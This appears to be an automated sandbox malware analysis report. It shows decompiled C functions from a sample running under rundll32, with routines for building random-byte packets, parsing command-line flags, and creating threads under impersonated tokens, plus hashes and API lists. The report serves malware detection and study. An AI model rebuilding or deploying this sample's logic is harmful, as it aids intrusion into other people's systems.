                                                                                                                                                              • Opcode ID: 0851a7dfb35d3885ae77c1e55f34d44a29032d0649b336cadb365942d8d2566c
                                                                                                                                                              • Instruction ID: 2d04462984e0d78fcfce12982c80d52e326e1cd3d3a6de2fea7ee287fb982aa4
                                                                                                                                                              • Opcode Fuzzy Hash: 0851a7dfb35d3885ae77c1e55f34d44a29032d0649b336cadb365942d8d2566c
                                                                                                                                                              • Instruction Fuzzy Hash: 290188B0D40335A7E725BBB69F0DE1A7EAAEB04797B146095E90192148DB78FC00DF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E04E250A2(void* __ecx, intOrPtr _a4, void* _a8, short _a12, signed int _a16) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				short _t27;
                                                                                                                                                              				short _t28;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				signed int _t44;
                                                                                                                                                              				long _t47;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(0x34);
                                                                                                                                                              				_t47 = 8;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t25 = HeapAlloc(GetProcessHeap(), _t47, ??);
                                                                                                                                                              				_t39 = _t25;
                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                              					L7:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					 *_t25 =  !( *(0x4e33730 + _t25));
                                                                                                                                                              					_t25 = _t25 + 1;
                                                                                                                                                              					_t47 = _t47 - 1;
                                                                                                                                                              				} while (_t47 != 0);
                                                                                                                                                              				_t27 = 0x34;
                                                                                                                                                              				 *((short*)(_t39 + 8)) = _t27;
                                                                                                                                                              				_t28 = 0x13;
                                                                                                                                                              				_t44 = 5;
                                                                                                                                                              				 *((intOrPtr*)(_t39 + 0xc)) = 3;
                                                                                                                                                              				 *((short*)(_t39 + 0x16)) = _t28;
                                                                                                                                                              				_t10 = _t39 + 0x18; // 0x18
                                                                                                                                                              				memcpy(_t10, _a16, _t44 << 2);
                                                                                                                                                              				if(E04E22F5A(_a4, _a8, _a12, 0, 0xff, 8, _t39, 0x34) != 0) {
                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                              					_a16 = _a16 & 0x00000000;
                                                                                                                                                              					if(E04E23071(0, _a4, _a8, _a12,  &_a16,  &_v12) != 0) {
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _a16);
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                              				goto L7;
                                                                                                                                                              			}











                                                                                                                                                              0x04e250a5
                                                                                                                                                              0x04e250a6
                                                                                                                                                              0x04e250a9
                                                                                                                                                              0x04e250ad
                                                                                                                                                              0x04e250af
                                                                                                                                                              0x04e250ba
                                                                                                                                                              0x04e250c0
                                                                                                                                                              0x04e250c4
                                                                                                                                                              0x04e25162
                                                                                                                                                              0x04e25168
                                                                                                                                                              0x04e25168
                                                                                                                                                              0x04e250d2
                                                                                                                                                              0x04e250d7
                                                                                                                                                              0x04e250d9
                                                                                                                                                              0x04e250da
                                                                                                                                                              0x04e250da
                                                                                                                                                              0x04e250df
                                                                                                                                                              0x04e250e5
                                                                                                                                                              0x04e250e9
                                                                                                                                                              0x04e250ec
                                                                                                                                                              0x04e250fc
                                                                                                                                                              0x04e25106
                                                                                                                                                              0x04e2510d
                                                                                                                                                              0x04e25110
                                                                                                                                                              0x04e2511f
                                                                                                                                                              0x04e25121
                                                                                                                                                              0x04e25125
                                                                                                                                                              0x04e25141
                                                                                                                                                              0x04e2514f
                                                                                                                                                              0x04e25151
                                                                                                                                                              0x04e25151
                                                                                                                                                              0x04e25141
                                                                                                                                                              0x04e2515f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000034,74654F20,00000000,?,?,?,04E252FD,?,?,?,?,?,?,?,00000000), ref: 04E250B3
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E252FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04E250BA
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0), ref: 04E25148
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E252FD,?,?,?,?,?,?,?,00000000,00000000), ref: 04E2514F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0,?,?,?,04E252FD,?), ref: 04E25158
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E252FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04E2515F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Free$Alloc
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 3689955550-3175316637
                                                                                                                                                              • Opcode ID: 2ef8ca84aa131508b785c8e63dea2115e57b8a1f14b1da01aa2285ea5c851ffc
                                                                                                                                                              • Instruction ID: d83c63b503a1a49dafd127cbda0eaf49d1f0f18fcf808bcacb023ba160165b92
                                                                                                                                                              • Opcode Fuzzy Hash: 2ef8ca84aa131508b785c8e63dea2115e57b8a1f14b1da01aa2285ea5c851ffc
                                                                                                                                                              • Instruction Fuzzy Hash: 9721C272540349BBFF228F94DE49FAB7B6CEF45319F044045FE44AA181C6B5AD19CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E04E2317C(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				signed int _t22;
                                                                                                                                                              				int _t24;
                                                                                                                                                              				signed int _t33;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x200);
                                                                                                                                                              				_v12 = _t19;
                                                                                                                                                              				if(_t19 != 0) {
                                                                                                                                                              					_t37 =  *_a8;
                                                                                                                                                              					_t22 = rand();
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					_t33 = 0x14;
                                                                                                                                                              					 *((intOrPtr*)(_t37 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t22 % _t33;
                                                                                                                                                              					_t38 = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						_t24 = rand();
                                                                                                                                                              						_t34 = _v12;
                                                                                                                                                              						 *(_t38 + _v12) = _t24;
                                                                                                                                                              						_t38 = _t38 + 1;
                                                                                                                                                              					} while (_t38 < 0x200);
                                                                                                                                                              					if(E04E22F5A(_a4,  *_a8, _a12, 0, 0xff, 4, _t34, 0x200) != 0) {
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}










                                                                                                                                                              0x04e2318a
                                                                                                                                                              0x04e23195
                                                                                                                                                              0x04e2319b
                                                                                                                                                              0x04e231a0
                                                                                                                                                              0x04e231ad
                                                                                                                                                              0x04e231af
                                                                                                                                                              0x04e231b3
                                                                                                                                                              0x04e231b4
                                                                                                                                                              0x04e231b7
                                                                                                                                                              0x04e231bb
                                                                                                                                                              0x04e231bd
                                                                                                                                                              0x04e231bd
                                                                                                                                                              0x04e231bf
                                                                                                                                                              0x04e231c2
                                                                                                                                                              0x04e231c5
                                                                                                                                                              0x04e231c6
                                                                                                                                                              0x04e231e9
                                                                                                                                                              0x04e231eb
                                                                                                                                                              0x04e231eb
                                                                                                                                                              0x04e231fb
                                                                                                                                                              0x04e231fb
                                                                                                                                                              0x04e23206

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,04E247E5,?,?,00000000,?,?,?,?,?,?), ref: 04E2318E
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E247E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04E23195
                                                                                                                                                              • rand.MSVCRT ref: 04E231AF
                                                                                                                                                              • rand.MSVCRT ref: 04E231BD
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,04E247E5,?,?,00000000,?), ref: 04E231F4
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E247E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04E231FB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Processrand$AllocFree
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1335519115-3175316637
                                                                                                                                                              • Opcode ID: 3d4e2deaaf6acba22de697e6d720885c7dfe8d694f04e294dcfce73990e8b887
                                                                                                                                                              • Instruction ID: d42d810afb0cd6ea1a5b7f2c409f82c650141e757b78b40a827d6c752da22a0a
                                                                                                                                                              • Opcode Fuzzy Hash: 3d4e2deaaf6acba22de697e6d720885c7dfe8d694f04e294dcfce73990e8b887
                                                                                                                                                              • Instruction Fuzzy Hash: D811C832500305BBEB119BA5CD45F9E7F79FF45755F004059FB04A7180DBBAA809CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E04E26BD1(void* __ecx, void* __esi) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				intOrPtr* _t30;
                                                                                                                                                              				intOrPtr* _t32;
                                                                                                                                                              				intOrPtr* _t47;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              
                                                                                                                                                              				_t52 = __esi;
                                                                                                                                                              				if(__esi != 0) {
                                                                                                                                                              					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
                                                                                                                                                              						L11:
                                                                                                                                                              						return HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                                                                                              					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
                                                                                                                                                              						L10:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
                                                                                                                                                              						goto L11;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L3;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L3:
                                                                                                                                                              						_t30 =  *(_t52 + 0x18) + _v8 * 4;
                                                                                                                                                              						if( *_t30 != 0) {
                                                                                                                                                              							_t32 =  *_t30;
                                                                                                                                                              							if( *_t32 != 0) {
                                                                                                                                                              								_t47 =  *((intOrPtr*)(_t52 + 0x30));
                                                                                                                                                              								if(_t47 != 0) {
                                                                                                                                                              									 *_t47( *_t32);
                                                                                                                                                              								}
                                                                                                                                                              								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
                                                                                                                                                              							}
                                                                                                                                                              							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = _v8 + 1;
                                                                                                                                                              					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
                                                                                                                                                              					goto L10;
                                                                                                                                                              				}
                                                                                                                                                              				return _t23;
                                                                                                                                                              			}









                                                                                                                                                              0x04e26bd1
                                                                                                                                                              0x04e26bd7
                                                                                                                                                              0x04e26bef
                                                                                                                                                              0x04e26c53
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26c5c
                                                                                                                                                              0x04e26bf4
                                                                                                                                                              0x04e26bfa
                                                                                                                                                              0x04e26c49
                                                                                                                                                              0x04e26c51
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26bfc
                                                                                                                                                              0x04e26bfc
                                                                                                                                                              0x04e26c02
                                                                                                                                                              0x04e26c08
                                                                                                                                                              0x04e26c0a
                                                                                                                                                              0x04e26c0f
                                                                                                                                                              0x04e26c11
                                                                                                                                                              0x04e26c16
                                                                                                                                                              0x04e26c1a
                                                                                                                                                              0x04e26c1a
                                                                                                                                                              0x04e26c2c
                                                                                                                                                              0x04e26c2c
                                                                                                                                                              0x04e26c3c
                                                                                                                                                              0x04e26c3c
                                                                                                                                                              0x04e26c3e
                                                                                                                                                              0x04e26c44
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26bfc
                                                                                                                                                              0x04e26c5e

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C29
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C2C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C39
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C3C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C4E
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C51
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C56
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C59
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                              • Opcode ID: 82bdd333dc2a56dd0c363556f6cb9dca7287f56be47291a73f74b1224d200f3c
                                                                                                                                                              • Instruction ID: 00e717eaebd7fecbda963b07caf316fb0f7098a4951a1d9bfae8a3ba973e7cea
                                                                                                                                                              • Opcode Fuzzy Hash: 82bdd333dc2a56dd0c363556f6cb9dca7287f56be47291a73f74b1224d200f3c
                                                                                                                                                              • Instruction Fuzzy Hash: 82114631600308EFDB24EFA6CE81F2AB3B9EF85349F010598E505972A1CB70FD44CA60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2652F(void* __ecx, signed int _a4) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				WCHAR** _v12;
                                                                                                                                                              				intOrPtr* _t20;
                                                                                                                                                              				int _t26;
                                                                                                                                                              				WCHAR** _t28;
                                                                                                                                                              				WCHAR* _t32;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                              				void* _t45;
                                                                                                                                                              				WCHAR* _t52;
                                                                                                                                                              				WCHAR* _t53;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					L20:
                                                                                                                                                              					if( *0x4e37bc4 == 0) {
                                                                                                                                                              						 *0x4e37bc4 = 0x2d;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t20 = _a4;
                                                                                                                                                              					_t45 = _t20 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t42 =  *_t20;
                                                                                                                                                              						_t20 = _t20 + 2;
                                                                                                                                                              					} while (_t42 != 0);
                                                                                                                                                              					if(_t20 == _t45) {
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t39 = CommandLineToArgvW(_a4,  &_v8);
                                                                                                                                                              					if(_t39 == 0) {
                                                                                                                                                              						L19:
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v8 <= 0) {
                                                                                                                                                              						L18:
                                                                                                                                                              						LocalFree(_t39);
                                                                                                                                                              						goto L19;
                                                                                                                                                              					}
                                                                                                                                                              					_t26 = StrToIntW( *_t39);
                                                                                                                                                              					_t44 = 1;
                                                                                                                                                              					_a4 = 1;
                                                                                                                                                              					if(_t26 > 0) {
                                                                                                                                                              						 *0x4e37bc4 = _t26;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v8 > _t44) {
                                                                                                                                                              						do {
                                                                                                                                                              							_t28 = _t39 + _a4 * 4;
                                                                                                                                                              							_t52 =  *_t28;
                                                                                                                                                              							_v12 = _t28;
                                                                                                                                                              							if(_t52 != StrStrW(_t52, L"-h")) {
                                                                                                                                                              								_t53 =  *_v12;
                                                                                                                                                              								if(_t53 != StrStrW(_t53, L"-f")) {
                                                                                                                                                              									_t32 = StrChrW(_t53, 0x3a);
                                                                                                                                                              									if(_t32 != 0) {
                                                                                                                                                              										_t44 = 0;
                                                                                                                                                              										 *_t32 = 0;
                                                                                                                                                              										E04E269AE(_t53,  &(_t32[1]), 1);
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									 *0x4e37b7c =  *0x4e37b7c & 0xfffffffd;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								E04E264A6(_t52, _t44);
                                                                                                                                                              							}
                                                                                                                                                              							_a4 =  &(_a4[0]);
                                                                                                                                                              						} while (_a4 < _v8);
                                                                                                                                                              					}
                                                                                                                                                              					goto L18;
                                                                                                                                                              				}
                                                                                                                                                              			}














                                                                                                                                                              0x04e2653a
                                                                                                                                                              0x04e2660e
                                                                                                                                                              0x04e26616
                                                                                                                                                              0x04e26618
                                                                                                                                                              0x04e26618
                                                                                                                                                              0x04e26625
                                                                                                                                                              0x04e26540
                                                                                                                                                              0x04e26540
                                                                                                                                                              0x04e26543
                                                                                                                                                              0x04e26546
                                                                                                                                                              0x04e26546
                                                                                                                                                              0x04e26549
                                                                                                                                                              0x04e2654c
                                                                                                                                                              0x04e26555
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26563
                                                                                                                                                              0x04e2656c
                                                                                                                                                              0x04e26570
                                                                                                                                                              0x04e2660d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2660d
                                                                                                                                                              0x04e26579
                                                                                                                                                              0x04e26606
                                                                                                                                                              0x04e26607
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26607
                                                                                                                                                              0x04e26581
                                                                                                                                                              0x04e26589
                                                                                                                                                              0x04e2658a
                                                                                                                                                              0x04e2658f
                                                                                                                                                              0x04e26591
                                                                                                                                                              0x04e26591
                                                                                                                                                              0x04e26599
                                                                                                                                                              0x04e265a2
                                                                                                                                                              0x04e265a5
                                                                                                                                                              0x04e265a8
                                                                                                                                                              0x04e265b0
                                                                                                                                                              0x04e265b7
                                                                                                                                                              0x04e265c5
                                                                                                                                                              0x04e265d1
                                                                                                                                                              0x04e265df
                                                                                                                                                              0x04e265e7
                                                                                                                                                              0x04e265e9
                                                                                                                                                              0x04e265eb
                                                                                                                                                              0x04e265f5
                                                                                                                                                              0x04e265f5
                                                                                                                                                              0x04e265d3
                                                                                                                                                              0x04e265d3
                                                                                                                                                              0x04e265d3
                                                                                                                                                              0x04e265b9
                                                                                                                                                              0x04e265bb
                                                                                                                                                              0x04e265bb
                                                                                                                                                              0x04e265fa
                                                                                                                                                              0x04e26600
                                                                                                                                                              0x04e26605
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26599

                                                                                                                                                              APIs
                                                                                                                                                              • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04E27A8E,?), ref: 04E26566
                                                                                                                                                              • StrToIntW.SHLWAPI(00000000,?,?,?,?,04E27A8E,?), ref: 04E26581
                                                                                                                                                              • StrStrW.SHLWAPI(00000000,04E31580,?,?,?,?,?,04E27A8E,?), ref: 04E265B3
                                                                                                                                                              • StrStrW.SHLWAPI(00000000,04E31588,?,?,?,?,?,04E27A8E,?), ref: 04E265CD
                                                                                                                                                              • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04E27A8E,?), ref: 04E265DF
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,04E27A8E,?), ref: 04E26607
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ArgvCommandFreeLineLocal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1203019955-0
                                                                                                                                                              • Opcode ID: f824a46b0237b9f151e862d0fa163ea47b32654c909fa36213cc763889cb5da7
                                                                                                                                                              • Instruction ID: bdd4da10a5fa64e05d017104d294e9121627d91c0572b5c31bdbe47fd311b8d9
                                                                                                                                                              • Opcode Fuzzy Hash: f824a46b0237b9f151e862d0fa163ea47b32654c909fa36213cc763889cb5da7
                                                                                                                                                              • Instruction Fuzzy Hash: 5F31C171900139EFDF229F74DA889AD7BA8FF1574AB109A65E402D7244E774FB40CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E04E298AB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void*** _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				void _v32;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t39;
                                                                                                                                                              				void _t41;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              
                                                                                                                                                              				_t39 = 0;
                                                                                                                                                              				_t41 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_t22 = E04E26CED(0,  &_v12);
                                                                                                                                                              				_v16 = _t22;
                                                                                                                                                              				if(_t22 == 0) {
                                                                                                                                                              					L12:
                                                                                                                                                              					return _t41;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t44 =  *( *_v12);
                                                                                                                                                              					_v32 = _t39;
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					asm("stosd");
                                                                                                                                                              					_v28 = _a4;
                                                                                                                                                              					_t29 = CreateThread(_t39, _t39, E04E2988B,  &_v32, 4, _t39);
                                                                                                                                                              					_v8 = _t29;
                                                                                                                                                              					if(_t29 != _t39) {
                                                                                                                                                              						if(SetThreadToken( &_v8, _t44) != 0) {
                                                                                                                                                              							if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                              								GetLastError();
                                                                                                                                                              							} else {
                                                                                                                                                              								WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						CloseHandle(_v8);
                                                                                                                                                              					}
                                                                                                                                                              					_t41 = _v32;
                                                                                                                                                              					if(_t41 != _t39 || E04E26D35(_v16, _a8,  &_v12) == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t39 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				E04E26B46(_v16);
                                                                                                                                                              				goto L12;
                                                                                                                                                              			}















                                                                                                                                                              0x04e298ba
                                                                                                                                                              0x04e298be
                                                                                                                                                              0x04e298c0
                                                                                                                                                              0x04e298c3
                                                                                                                                                              0x04e298c8
                                                                                                                                                              0x04e298cd
                                                                                                                                                              0x04e29969
                                                                                                                                                              0x04e2996f
                                                                                                                                                              0x04e2996f
                                                                                                                                                              0x04e298d7
                                                                                                                                                              0x04e298dc
                                                                                                                                                              0x04e298e0
                                                                                                                                                              0x04e298e6
                                                                                                                                                              0x04e298e7
                                                                                                                                                              0x04e298e8
                                                                                                                                                              0x04e298ef
                                                                                                                                                              0x04e298fd
                                                                                                                                                              0x04e29903
                                                                                                                                                              0x04e29908
                                                                                                                                                              0x04e29917
                                                                                                                                                              0x04e29925
                                                                                                                                                              0x04e29934
                                                                                                                                                              0x04e29927
                                                                                                                                                              0x04e2992c
                                                                                                                                                              0x04e2992c
                                                                                                                                                              0x04e29925
                                                                                                                                                              0x04e2993d
                                                                                                                                                              0x04e2993d
                                                                                                                                                              0x04e29943
                                                                                                                                                              0x04e29948
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e298d5
                                                                                                                                                              0x04e298d5
                                                                                                                                                              0x04e29964
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E26CED: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74654F20,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26CFC
                                                                                                                                                                • Part of subcall function 04E26CED: HeapAlloc.KERNEL32(00000000,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26CFF
                                                                                                                                                                • Part of subcall function 04E26CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D24
                                                                                                                                                                • Part of subcall function 04E26CED: HeapFree.KERNEL32(00000000,?,04E26B24,00000000,00000000,77D74620,?,?,04E2A222,00000000), ref: 04E26D27
                                                                                                                                                              • CreateThread.KERNEL32 ref: 04E298FD
                                                                                                                                                              • SetThreadToken.ADVAPI32(?,?,?,04E2A15C,?,?), ref: 04E2990F
